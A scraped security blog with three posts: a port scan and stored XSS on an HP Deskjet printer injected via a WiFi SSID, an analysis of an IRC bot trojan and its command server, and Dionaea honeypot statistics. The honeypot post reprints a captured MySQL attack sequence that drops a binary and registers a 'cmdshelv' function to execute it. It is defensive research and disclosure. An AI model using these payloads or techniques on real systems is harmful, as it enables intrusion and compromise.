<i>Host is up (0.28s latency).</i><br />
<i>Not shown: 65520 closed ports</i><br />
<i>PORT STATE SERVICE</i><br />
<i>80/tcp open http</i><br />
<i>443/tcp open https</i><br />
<i>631/tcp open ipp</i><br />
<i>3910/tcp open unknown</i><br />
<i>3911/tcp open unknown</i><br />
<i>6839/tcp open unknown</i><br />
<i>7435/tcp open unknown</i><br />
<i>8080/tcp open http-proxy</i><br />
<i>9100/tcp open jetdirect</i><br />
<i>9101/tcp open jetdirect</i><br />
<i>9102/tcp open jetdirect</i><br />
<i>9110/tcp open unknown</i><br />
<i>9111/tcp open DragonIDSConsole</i><br />
<i>9112/tcp open unknown</i><br />
<i>9220/tcp open unknown</i><br />
<i>9290/tcp open unknown</i><br />
<i>MAC Address: 2C:76:8A:7D:7A:A8 (Unknown)</i><br />
<i>Nmap done: 1 IP address (1 host up) scanned in 855.57 seconds</i><br />
<br />
Ok cool, let's see the HTTP server and the Web interface ...<br />
<br />
Printer's HTTP server name is too verbose, it looks like :<br />
<br />
<i>HP HTTP Server; HP Deskjet 3070 B611 series - 012345; Serial Number: 0123456789ABCD; Munich_mp1 Built:Thu Apr 28, 2011 03:49:36PM {0123456789ABC, ASIC id 0x00340100}</i><br />
<br />
Yes we can get the serial number from the HTTP Server header :)<br />
<br />
<br />
<div style="text-align: justify;">
Now if we take a look on the web interface, we can found a fun XSS. As this printer is Wifi capable, we can configure Wifi using this interface. But what about a cool SSID like "<i><script>
alert('owned?')
</script></i>" ? </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I let you setup your AP with aforementioned SSID. Note than you can use an Android phone, it's easy and quick to configure :)</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
As soon as this Wifi AP is setup, you can configure you printer to use it : Network > Wireless Setup Wizard (<i>https://<IP></i><ip><i>/#hId-setupPage</i>).</ip></div>
<br />
<br />
Click on "Start Wizard" :<br />
<br />
<a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7fEjfuVpwrRjTfBvsCB6vWAcTbFcHLgnDgnBCyIBp3Zh_qVKvYaxP-ACPchbpLePU8aIlwqlHNnUI42NyDf7JF1a9o5b0u6rZD916dhcWCeqYxqSq_tWSMqR2QyO0OgpULTxHZ3rzvlxr/s1600/1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7fEjfuVpwrRjTfBvsCB6vWAcTbFcHLgnDgnBCyIBp3Zh_qVKvYaxP-ACPchbpLePU8aIlwqlHNnUI42NyDf7JF1a9o5b0u6rZD916dhcWCeqYxqSq_tWSMqR2QyO0OgpULTxHZ3rzvlxr/s400/1.png" width="400" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
We can see our new AP :<br />
<br />
<a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijiOzL4A0YECJY7foXM3CN6_gho-Jov5YrOI9IUo14wTQeVN7rf7E1Rs68FXGxu6KM42xazzSqH2s2yCw5kUu3UcRFKLybVOQaWlHc42JDH01Iojd6I6BzRbZtRL5F68b-F0iManJYw36C/s1600/2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="273" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijiOzL4A0YECJY7foXM3CN6_gho-Jov5YrOI9IUo14wTQeVN7rf7E1Rs68FXGxu6KM42xazzSqH2s2yCw5kUu3UcRFKLybVOQaWlHc42JDH01Iojd6I6BzRbZtRL5F68b-F0iManJYw36C/s400/2.png" width="400" /></a><br />
<picture></picture><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /><br />
<br />
Now if we select it and click on "Next", we get our XSS :D<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj75mO5OOLIBKp1UhEw2o5wMOtxGTZ_LxXYOOQB5g5jLGz4ZBO6y7QMS8fZxRJ9jvM7sqrIfLvxCQAumq5pdvwY3GlCQ7yJE25HnBbOpceZ_8Wyb_ohSGFpjk8blM_QOH9PmfkMZLPeiwRX/s1600/3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj75mO5OOLIBKp1UhEw2o5wMOtxGTZ_LxXYOOQB5g5jLGz4ZBO6y7QMS8fZxRJ9jvM7sqrIfLvxCQAumq5pdvwY3GlCQ7yJE25HnBbOpceZ_8Wyb_ohSGFpjk8blM_QOH9PmfkMZLPeiwRX/s400/3.png" width="400" /></a></div>
<br /><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com1Paris, France48.856614 2.352221948.7731235 2.1942934 48.940104500000004 2.5101504tag:blogger.com,1999:blog-6555208034441643895.post-180611709488609242012-01-29T23:03:00.000+01:002012-02-02T00:38:57.269+01:00Caught and analyzed<div style="text-align: justify;">
In last september, I was playing with Dionaea honeypot which is a great tool (<a class="vt-p" href="http://steeve-barbeau.blogspot.com/2011/10/some-stats-of-my-dionaea-honeypot.html" target="_blank">see previous article</a>). After have caught some malwares I would to analyse one of them.</div>
<div>
<div style="text-align: justify;">
<br /></div>
<br />
<b><span style="font-size: large;">Informations about the file</span></b></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
According to the VirusTotal <a class="vt-p" href="http://www.virustotal.com/file-scan/report.html?id=273040d07e3d2c1153967015fa069de7e3086163651babcc07ab321b289d70d5-1314124477" target="_blank">report</a>, the file I've choose to analyzed is an IRC bot. VT shows an interesting information : the malware seems to be packed with PolyCrypt. In fact the packer version is exactly PolyCrypt PE 2.1.5. During the analysis I have found these string relating to the packer software : "PolyCrypt PE (c) 2004-2005, JLabSoftware.".</div>
</div>
<div>
<br /></div>
<div>
After unpacking, we can take a look to the imported DLL and functions : <a class="vt-p" href="http://pastebin.com/gfUar4Pt" target="_blank">details here</a></div>
<div>
<br />
And now we can start the real work : the reverse of the malware !<br />
<br />
<br />
<b><span style="font-size: large;">Let's start the analysis</span></b><br />
<br />
<a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUvVKYLzse6EuOgXs9_1V3pk9mWMvkqLDs0CiMFyflSdPbqG_owo7kqqaWZRIuVlZryo-LCk3AQXOsTI-SugqoMQn7DwK9zJkg55gfFWBgNoFPCKsbkoScjat1t7ifFOWTWyC5O7xBlMAk/s1600/Screen+Shot+2011-11-13+at+9.41.14+PM.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="144" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUvVKYLzse6EuOgXs9_1V3pk9mWMvkqLDs0CiMFyflSdPbqG_owo7kqqaWZRIuVlZryo-LCk3AQXOsTI-SugqoMQn7DwK9zJkg55gfFWBgNoFPCKsbkoScjat1t7ifFOWTWyC5O7xBlMAk/s320/Screen+Shot+2011-11-13+at+9.41.14+PM.png" width="320" /></a><br />
<div style="text-align: justify;">
At startup, the malware creates a script file located at <i>c:\a.bat.</i> The script can be downloaded <a class="vt-p" href="http://pastebin.com/Nf4v50Z6" target="_blank">here</a>.</div>
<br />
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
The script creates file 1.reg in temp directory (c:\Documents and Settings\%user%\Local Settings\Temp), then run regedit with the created reg file before to delete 1.reg and himself.</div>
<div style="text-align: justify;">
The reg file disables DCOM, RemoteConnect, restricts anonymous access, disables admin shares (for example C$), changes a lot of TCP/IP parameters and increases the number of possible simultaneous connections to a single HTTP 1.0/1.1 server (50 and 50 instead of respectively 4 and 2). It's obvious that the aim of this last registry modification is to increase DOS effects.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg74TlDCG9TPj86sp6efFSlmQlQxGlFjbnDbEL5jdoy0KcCQz5Yru9d1apYiKHd3c3HVqM2XIQ5EwkOS906BQwqTg94e9x3CDSz3tyLUt8IxGAVtIdJzPstjRoyIRAg6HMlCXmn8ZUC6gr-/s1600/Screenshot+at+2012-01-08+11%253A34%253A51.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: justify;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg74TlDCG9TPj86sp6efFSlmQlQxGlFjbnDbEL5jdoy0KcCQz5Yru9d1apYiKHd3c3HVqM2XIQ5EwkOS906BQwqTg94e9x3CDSz3tyLUt8IxGAVtIdJzPstjRoyIRAg6HMlCXmn8ZUC6gr-/s320/Screenshot+at+2012-01-08+11%253A34%253A51.png" width="320" /></a></div>
<div style="text-align: justify;">
After that registry tweaking, the malware copy himself in c:\windows\system32\host.exe (host.exe is the original filename during spreading). It sets the create, modify and access time of explorer.exe to host.exe. Then, it runs the malware copy which will delete the first malware file.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The malware will edit registry to be executed after reboot. So it adds an entry in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\{Run,RunServices} and in HKEY_CURRENT_USER\Software\Microsoft\OLE named "Windows Update" with "host.exe" as value. Then a thread checks running processes every 30 seconds, a list of around 600 process name is parsed. A second thread disables DCOM, restricts anonymous access and disables IPC$ share every 2 minutes. And the last created thread, checks every 120 milliseconds that the malware will be executing at OS startup. After the creation of these 3 threads, Internet status is checked every 30 seconds and if the victim host has Internet access, the payload is run.</div>
<br />
<br />
<b><span style="font-size: large;">Payload</span></b><br />
<br />
<div style="text-align: justify;">
Of course, as this malware is an IRC bot, it implements some IRC commands like USER, PASS, NICK, JOIN, PONG, NOTICE, PRIVMSG, QUIT... After each action, the bot will send to the IRC C&C server NOTICE or PRIVMSG message to report the success or not of the action.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This payload has many features :</div>
<div style="text-align: justify;">
- keylogger</div>
<div style="text-align: justify;">
- Ping, TCP, UDP, HTTP flood</div>
<div style="text-align: justify;">
- DNS cache flush</div>
<div style="text-align: justify;">
- ARP table flush</div>
<div style="text-align: justify;">
- send email (spam)</div>
<div style="text-align: justify;">
- search files and directories</div>
<div style="text-align: justify;">
- move files</div>
<div style="text-align: justify;">
- get informations about the system : CPU number, CPU frequency, memory usage, disk space, disk type (network, cdrom ...), username, OS version (95, 98, ME, NT, 2000, 2003, XP or Unkown), user domain ...</div>
<div style="text-align: justify;">
- get informations about the network : IP, hostname, connection type</div>
<div style="text-align: justify;">
- get serial of 42 games (Counter-Strike, FIFA 2003... whole list <a class="vt-p" href="http://pastebin.com/U0Anbknq" target="_blank">here</a>), Windows product key and the customer number</div>
<div style="text-align: justify;">
- get clipboard data</div>
<div style="text-align: justify;">
- list running AV/FW and other "security products" (ollydbg ...). The <a class="vt-p" href="http://pastebin.com/dsSNmyhq" target="_blank">list</a> contains around 600 processes.</div>
<div style="text-align: justify;">
- list registered services and their status (unknown, paused, pausing, continuing, starting, stoping, stoped, running, stopped)</div>
<div style="text-align: justify;">
- manage services</div>
<div style="text-align: justify;">
- restore the system in a healthy state (delete the registry key and the malware file)</div>
<div style="text-align: justify;">
- download and run binary files</div>
<div style="text-align: justify;">
- send files</div>
<div style="text-align: justify;">
- kill processes</div>
<div style="text-align: justify;">
- reverse shell (after authentication on the bot)</div>
<div style="text-align: justify;">
- update mecanism</div>
<div style="text-align: justify;">
- network sniffing</div>
<div style="text-align: justify;">
- TCP ports scan</div>
<div style="text-align: justify;">
- basic FTP server</div>
<div style="text-align: justify;">
- basic HTTP server used to download files and to send back file and directory search report</div>
<div style="text-align: justify;">
- bruteforce SQL server using a built-in list of around 1700 passwords (list <a class="vt-p" href="http://pastebin.com/E3rrFqr3" target="_blank">here</a>). If logon success, it will download by FTP the malware and run it thanks to "EXEC master..xp_cmdshell".</div>
<div style="text-align: justify;">
- video recording using webcam</div>
<div style="text-align: justify;">
- screenshot capabilities</div>
<div style="text-align: justify;">
- add $C, $IPC, and $ADMIN network shares</div>
<div style="text-align: justify;">
- ...</div>
<br />
<br />
<b><span style="font-size: large;">Commands</span></b><br />
<br />
A non-exhaustive list of IRC commands can be downloaded <a class="vt-p" href="http://pastebin.com/nxWKicMU" target="_blank">here</a>.<br />
<br />
<br />
<b><span style="font-size: large;">C&C</span></b><br />
<br />
<div style="text-align: justify;">
Botnet owners use IRC to exchange informations with bots, send commands ... The domain name used to contact the C&C is blah.swXXXXXXXme.com and seems to be located in England (isp : ValueVPS Limited - Hosting network). The IRC server used by this C&C server is UnrealIRCd 3.2.7 which is listening on port 7878. Channels listed are #GuardBot-Admin, #uk, #fuckoff and #b (joined by bots). A password (imallowed2020) is required to join #b channel.</div>
<div style="text-align: justify;">
Bots name are something similare to [GSA]-123456.</div>
<br />
Port 7878 isn't the only open port :<br />
<ul>
<li>80/tcp open http Apache httpd 2.2.14 ((Fedora))</li>
<li>99/tcp open ssh OpenSSH 5.1 (protocol 2.0)</li>
<li>6001/tcp open irc Unreal ircd (used to link to other irc servers)</li>
<li>7878/tcp open irc Unreal ircd (used by irc clients)</li>
<li>10000/tcp open http MiniServ 1.530 (Webmin httpd)</li>
<li>65146/tcp open irc Unreal ircd (used by irc clients)</li>
</ul>
<br />
<div style="text-align: justify;">
Apache is hosting the default apache webpage and on port 10000 we can find Webmin interface to administrate the server.</div>
<div style="text-align: justify;">
OS seems to be a Fedora 12 with a 2.6 kernel.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This C&C server doesn't control a huge botnet. I have done several connections to this botnet, and the number of bots was between 467 and 1393. According IRC stats, the max number of IRC users (bots) was 4088.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<i>STATS u</i></div>
<div style="text-align: justify;">
<i>:pwned28.ircd.net 242 [GSA]-370921 :Server Up 0 days, 21:46:20</i></div>
<div style="text-align: justify;">
<i>:pwned28.ircd.net 250 [GSA]-370921 :Highest connection count: 1393 (4088 clients)</i></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In addition, this server suffer from reliability problems. During my analysis, it was sometimes unavailable (january 9th, 12th...).</div>
<br />
<br />
<b><span style="font-size: x-large;">How to delete it ?</span></b><br />
<br />
<div style="text-align: justify;">
As this malware isn't an advanced one, it's easy to remove it from an infected computer. First you have to kill "host.exe" process using task manager or an other tool. Then you must delete the file "host.exe" located in c:\windows\system32\. With default view options, the file is invisible. You need to uncheck "Hide protected operating system files" in Windows view options. Finally, in the registry you have to delete the key "Windows Update" stored in HKEY_CURRENT_USER\Software\Microsoft\OLE and in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\{Run,RunServices}. It could be great to restore all other registry values modified by a.bat file at the beginning of the infection but you will need original values to do that ...</div>
<br />
<br />
<b><span style="font-size: x-large;">Comments</span></b><br />
<br />
<div style="text-align: justify;">
This malware isn't very stealth because we can found it quite easily in file system and it's even easier with task manager. According to Windows version that the malware can detect and the list of games, I can say that's an old malware with no advanced protections against RE.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Nowadays, some (a lot of ?) malware are developed by governments and cybercriminal groups. I think that's not the case of this trojan because of its "simplicity", the unreliable C&C server and some strings found in it, like "Goodbye happy r00ting.", "NzmxFtpd Owns j0" and "Nice try, idiot." doesn't look professionnal.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I have found on the Internet, a SNORT rules file which list IP address used by the C&C server. So if you have an IDS in your company, you can use this <a class="vt-p" href="http://rules.emergingthreats.net/blockrules/emerging-botcc.rules" target="_blank">rules file</a> which contains a list of known C&C servers, to generate alerts when an host is communicating with one of these servers.</div>
<div style="text-align: justify;">
<br /></div>
</div><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com1tag:blogger.com,1999:blog-6555208034441643895.post-54189989922940363872011-10-09T18:59:00.000+02:002011-11-20T13:35:12.489+01:00Some stats of my dionaea honeypot<script src="http://www.google.com/jsapi" type="text/javascript">
</script>
<script type="text/javascript">
google.load('visualization', '1', {packages: ['geomap']});
</script>
<script type="text/javascript">
function drawVisualization() {
// Create and populate the data table.
var data = new google.visualization.DataTable();
data.addColumn('string', '', 'Country');
data.addColumn('number', 'Hosts');
data.addRows(45);
data.setValue(0, 0, 'FR');
data.setValue(0, 1, 157);
data.setValue(1, 0, 'BG');
data.setValue(1, 1, 3);
data.setValue(2, 0, 'UA');
data.setValue(2, 1, 22);
data.setValue(3, 0, 'HR');
data.setValue(3, 1, 3);
data.setValue(4, 0, 'SG');
data.setValue(4, 1, 4);
data.setValue(5, 0, 'BO');
data.setValue(5, 1, 1);
data.setValue(6, 0, 'JP');
data.setValue(6, 1, 4);
data.setValue(7, 0, 'CH');
data.setValue(7, 1, 6);
data.setValue(8, 0, 'BR');
data.setValue(8, 1, 6);
data.setValue(9, 0, 'FI');
data.setValue(9, 1, 24);
data.setValue(10, 0, 'RU');
data.setValue(10, 1, 29);
data.setValue(11, 0, 'NL');
data.setValue(11, 1, 5);
data.setValue(12, 0, 'PT');
data.setValue(12, 1, 5);
data.setValue(13, 0, 'NO');
data.setValue(13, 1, 11);
data.setValue(14, 0, 'TW');
data.setValue(14, 1, 5);
data.setValue(15, 0, 'TR');
data.setValue(15, 1, 13);
data.setValue(16, 0, 'NZ');
data.setValue(16, 1, 11);
data.setValue(17, 0, 'A2');
data.setValue(17, 1, 1);
data.setValue(18, 0, 'TH');
data.setValue(18, 1, 1);
data.setValue(19, 0, 'PK');
data.setValue(19, 1, 1);
data.setValue(20, 0, 'RO');
data.setValue(20, 1, 6);
data.setValue(21, 0, 'EG');
data.setValue(21, 1, 4);
data.setValue(22, 0, 'PL');
data.setValue(22, 1, 13);
data.setValue(23, 0, 'DE');
data.setValue(23, 1, 327);
data.setValue(24, 0, 'CO');
data.setValue(24, 1, 9);
data.setValue(25, 0, 'CN');
data.setValue(25, 1, 669);
data.setValue(26, 0, 'PS');
data.setValue(26, 1, 6);
data.setValue(27, 0, 'EE');
data.setValue(27, 1, 3);
data.setValue(28, 0, 'CA');
data.setValue(28, 1, 12);
data.setValue(29, 0, 'IR');
data.setValue(29, 1, 4);
data.setValue(30, 0, 'IT');
data.setValue(30, 1, 2);
data.setValue(31, 0, 'VN');
data.setValue(31, 1, 4);
data.setValue(32, 0, 'ZA');
data.setValue(32, 1, 6);
data.setValue(33, 0, 'CZ');
data.setValue(33, 1, 4);
data.setValue(34, 0, 'AU');
data.setValue(34, 1, 1);
data.setValue(35, 0, 'GB');
data.setValue(35, 1, 22);
data.setValue(36, 0, 'AZ');
data.setValue(36, 1, 3);
data.setValue(37, 0, 'ES');
data.setValue(37, 1, 45);
data.setValue(38, 0, 'ML');
data.setValue(38, 1, 1);
data.setValue(39, 0, 'US');
data.setValue(39, 1, 52);
data.setValue(40, 0, 'KR');
data.setValue(40, 1, 16);
data.setValue(41, 0, 'KW');
data.setValue(41, 1, 2);
data.setValue(42, 0, 'MY');
data.setValue(42, 1, 3);
data.setValue(43, 0, 'SE');
data.setValue(43, 1, 11);
data.setValue(44, 0, 'IL');
data.setValue(44, 1, 3);
var geomap = new google.visualization.GeoMap(document.getElementById('geo_map'));
geomap.draw(data, null);
}
google.setOnLoadCallback(drawVisualization);
</script>
Last month, my PC was running Dionaea honeypot during two periods of some days. So I decided to share some statistics about the attacked services, localization of the attacker, OS of the attacker ...<br />
I have also list SQL requests used to get these informations.<br />
<br />
<br />
<b><span class="Apple-style-span" style="font-size: large;">P0f informations</span></b><br />
<br />
<a class="vt-p" href="http://lcamtuf.coredump.cx/p0f.shtml">P0f</a> is a passive OS fingerprinting tool which will analyze network traffic to get informations like operating system version, firewall presence, NAT use, distance to the remote host and also about the kind of link used.<br />
FYI : You need to enable p0f in dionaea configuration file and run p0f tool in order to have these datas.<br />
<br />
<i>select count(p0f_genre||p0f_detail) as count, (p0f_genre || " " || p0f_detail) as OS from p0fs group by (p0f_genre||p0f_detail) order by count desc; </i><br />
<div>
<div style="text-align: left;">
<br /></div>
<table border="1" style="border-bottom-style: solid; border-collapse: collapse; border-left-style: solid; border-right-style: solid; border-top-style: solid; text-align: left;">
<tbody>
<tr>
<th>count</th><th>OS</th>
</tr>
<tr>
<td>7509</td><td></td>
</tr>
<tr>
<td>104</td><td>Windows 2000 SP4, XP SP1+</td>
</tr>
<tr>
<td>46</td><td>Windows XP/2000 (RFC1323+, w+, tstamp-)</td>
</tr>
<tr>
<td>31</td><td>Windows 2000 SP2+, XP SP1+ (seldom 98)</td>
</tr>
<tr>
<td>17</td><td>Linux 2.6 (newer, 3)</td>
</tr>
<tr>
<td>11</td><td>Linux 2.6 (newer, 2)</td>
</tr>
<tr>
<td>8</td><td>Windows XP SP1+, 2000 SP3</td>
</tr>
<tr>
<td>7</td><td>Linux 2.4-2.6</td>
</tr>
<tr>
<td>6</td><td>Windows XP/2000 (RFC1323+, w, tstamp+)</td>
</tr>
<tr>
<td>3</td><td>Windows 95</td>
</tr>
<tr>
<td>2</td><td>SunOS 4.1.x</td>
</tr>
<tr>
<td>1</td><td>Linux 2.6? (barebone, rare!)</td>
</tr>
<tr>
<td>1</td><td>Windows 98 (no sack)</td>
</tr>
</tbody></table>
<div style="text-align: left;">
<br /></div>
<br />
<i>select count(p0f_link) as count, p0f_link as link from p0fs group by p0f_link order by count desc;</i><br />
<i><br /></i><br />
<table border="1" style="border-collapse: collapse; border-style: solid;">
<tbody>
<tr>
<th>count</th><th>link</th>
</tr>
<tr>
<td>6051</td><td></td>
</tr>
<tr>
<td>1533</td><td>ethernet/modem</td>
</tr>
<tr>
<td>101</td><td>pppoe (DSL)</td>
</tr>
<tr>
<td>39</td><td>IPv6/IPIP</td>
</tr>
<tr>
<td>10</td><td>(Google/AOL)</td>
</tr>
<tr>
<td>5</td><td>GPRS, T1, FreeS/WAN</td>
</tr>
<tr>
<td>3</td><td>PIX, SMC, sometimes wireless</td>
</tr>
<tr>
<td>3</td><td>sometimes DSL (2)</td>
</tr>
<tr>
<td>1</td><td>vtun</td>
</tr>
</tbody></table>
<br />
<div>
<br />
<b><span class="Apple-style-span" style="font-size: large;">Targeted local port</span></b></div>
<div>
<br /></div>
<div>
<i>select count(local_port) as count, local_port as "targeted port" from connections group by local_port order by count desc;</i>
<br />
<i><br /></i></div>
<table border="1" style="border-collapse: collapse; border-style: solid;">
<tbody>
<tr>
<th>count</th><th>targeted port</th>
</tr>
<tr>
<td>1201</td><td>42</td>
</tr>
<tr>
<td>335</td><td>80</td>
</tr>
<tr>
<td>123</td><td>135</td>
</tr>
<tr>
<td>113</td><td>1433</td>
</tr>
<tr>
<td>87</td><td>32554</td>
</tr>
<tr>
<td>72</td><td>32045</td>
</tr>
<tr>
<td>61</td><td>5060</td>
</tr>
<tr>
<td>38</td><td>3389</td>
</tr>
<tr>
<td>38</td><td>8008</td>
</tr>
<tr>
<td>37</td><td>23</td>
</tr>
<tr>
<td colspan="2">...</td>
</tr>
<tr>
<td>18</td><td>445</td>
</tr>
<tr>
<td colspan="2">...</td>
</tr>
</tbody></table>
<br />
Services most targeted here are WINS, Web servers, Epmap/DCOM, SQL Server, Sip, RDP, Telnet.<br />
<br />
<br />
<b><span class="Apple-style-span" style="font-size: large;">Location of attackers / malware sources</span></b><br />
<div>
<br /></div>
<div>
<i>select count(remote_host) as count, remote_host from connections group by remote_host order by count desc;</i><br />
<br /></div>
<div id="geo_map" style="height: 350px; width: 600px;">
</div>
<div>
<br />
If we look at the map, we can see lot of connections from France. But I can explain some of them, because when my honeypot was running, I have launched some ports scan. In order to have reliable statistics, I have removed of the sqlite database connections coming from my IP but I think I've omitted some of them.<br />
<br />
<br />
<b><span class="Apple-style-span" style="font-size: large;">Protocol informations</span></b><br />
<br />
<i>select count(connection_transport) as count, connection_transport from connections group by connection_transport order by count desc;</i><br />
<br /></div>
<table border="1" style="border-collapse: collapse; border-style: solid;">
<tbody>
<tr>
<th>count</th><th>connection_transport</th>
</tr>
<tr>
<td>6959</td><td>tcp</td>
</tr>
<tr>
<td>85</td><td>udp</td>
</tr>
<tr>
<td>13</td><td>tls</td>
</tr>
</tbody></table>
<br />
<div>
<br /></div>
<div>
<i>select count(connection_protocol) as count, connection_protocol from connections group by connection_protocol order by count desc;</i><br />
<br /></div>
<table border="1" style="border-collapse: collapse; border-style: solid;">
<tbody>
<tr>
<th>count</th><th>connection_protocol</th>
</tr>
<tr>
<td>3929</td><td>pcap</td>
</tr>
<tr>
<td>1204</td><td>mirrorc</td>
</tr>
<tr>
<td>1201</td><td>mirrord</td>
</tr>
<tr>
<td>335</td><td>httpd</td>
</tr>
<tr>
<td>123</td><td>epmapper</td>
</tr>
<tr>
<td>113</td><td>mssqld</td>
</tr>
<tr>
<td>70</td><td>SipSession</td>
</tr>
<tr>
<td>54</td><td>TftpClient</td>
</tr>
<tr>
<td>17</td><td>smbd</td>
</tr>
<tr>
<td>7</td><td>mysqld</td>
</tr>
<tr>
<td>4</td><td>SipCall</td>
</tr>
</tbody></table>
<br />
<br />
<br />
<b><span class="Apple-style-span" style="font-size: large;">Default passwords</span></b><br />
<br />
<div>
<i>select count(logins.login_username||logins.login_password) as count, logins.login_username, logins.login_password, connections.connection_protocol, connections.local_port from logins, connections where connections.connection = logins.connection group by (logins.login_username||logins.login_password) order by count desc;</i><br />
<br /></div>
<table border="1" style="border-collapse: collapse; border-style: solid;">
<tbody>
<tr>
<th>count</th><th>login_username</th><th>login_password</th><th>connection_protocol</th><th>local_port</th>
</tr>
<tr>
<td>95</td><td>sa</td><td></td><td>mssqld</td><td>1433</td>
</tr>
<tr>
<td>6</td><td>root</td><td></td><td>mysqld</td><td>3306</td>
</tr>
</tbody></table>
<br />
<div>
<br /></div>
<div>
<div>
Malwares targeting my honeypot have tried to connect to MySQL with root/<blank> and to Microsoft SQL Server with sa/<blank> which are both default credentials.</blank></blank></div>
<div>
<br />
<br />
<br />
<b><span class="Apple-style-span" style="font-size: large;">MySQL requests</span></b><br />
<br />
<i>select * from mysql_command_args;</i></div>
</div>
<div>
<br />
Look output of this request is quite fun :<br />
<blockquote>
drop function cmdshell<br />
drop function cmdshell<br />
drop function my_udfdoor<br />
drop function my_udfdoor<br />
drop function do_system<br />
drop function do_system<br />
use mysql;<br />
use mysql;<br />
drop table if exists tempMix4;<br />
drop table if exists tempMix4;<br />
create table if not exists tempMix4(data LONGBLOB);<br />
create table if not exists tempMix4(data LONGBLOB);<br />
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);<br />
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);<br />
INSERT INTO tempMix4 VALUES (@a);<br />
select data from tempMix4 into DUMPFILE 'C:\\12345.exe';<br />
drop table if exists tempMix4;<br />
use mysql;<br />
drop table if exists tempMix;<br />
create table if not exists tempMix(data LONGBLOB);<br />
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);<br />
INSERT INTO tempMix VALUES (@a);<br />
select data from tempMix into DUMPFILE 'C:\\WINDOWS\\amd.dll'<br />
INSERT INTO tempMix4 VALUES (@a);<br />
select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'<br />
select data from tempMix4 into DUMPFILE 'C:\\12345.exe';<br />
select data from tempMix into DUMPFILE 'C:\\WINDOWS\\SYSTEM32\\amd.dll'<br />
select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'<br />
select data from tempMix into DUMPFILE '..\\lib\\plugin\\amd.dll'<br />
drop table if exists tempMix4;<br />
select data from tempMix into DUMPFILE 'D:\\amd.dll'<br />
use mysql;<br />
select data from tempMix into DUMPFILE '..\\bin\\amd.dll'<br />
drop table if exists tempMix;<br />
create table if not exists tempMix(data LONGBLOB);<br />
create function cmdshelv returns string soname 'amd.dll';<br />
create function cmdshelv returns string soname 'amd.dll'<br />
create function cmdshelv returns string soname 'C:\\WINDOWS\\system32\\amd.dll'<br />
create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll'<br />
create function cmdshelv returns string soname 'C:\\WINDOWS\\SYSTEM32\\amd.dll';<br />
create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll';<br />
create function cmdshelv returns string soname 'amd.dll'<br />
select cmdshelv('c:\\12345.exe')<br />
select cmdshelv('c:\\12345.exe');<br />
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);<br />
select cmdshelv('cmd.exe cmd/c del c:\12345.exe');</blockquote>
<br />
<div>
For more informations, you can read this article : <a class="vt-p" href="http://carnivore.it/2011/06/12/the_mysql_cmdshelv">http://carnivore.it/2011/06/12/the_mysql_cmdshelv</a></div>
<br />
<br />
<br />
<b><span class="Apple-style-span" style="font-size: large;">RPC vulnerabilities</span></b><br />
<br />
<i>select dcerpcservices.dcerpcservice_name, dcerpcserviceops.dcerpcserviceop_name, dcerpcserviceops.dcerpcserviceop_vuln from dcerpcservices, dcerpcserviceops where dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice and dcerpcserviceop_vuln is not "";</i><br />
<br />
<table border="1" style="border-collapse: collapse; border-style: solid;">
<tbody>
<tr>
<th>dcerpcservice_name</th><th>dcerpcserviceop_name</th><th>dcerpcserviceop_vuln</th>
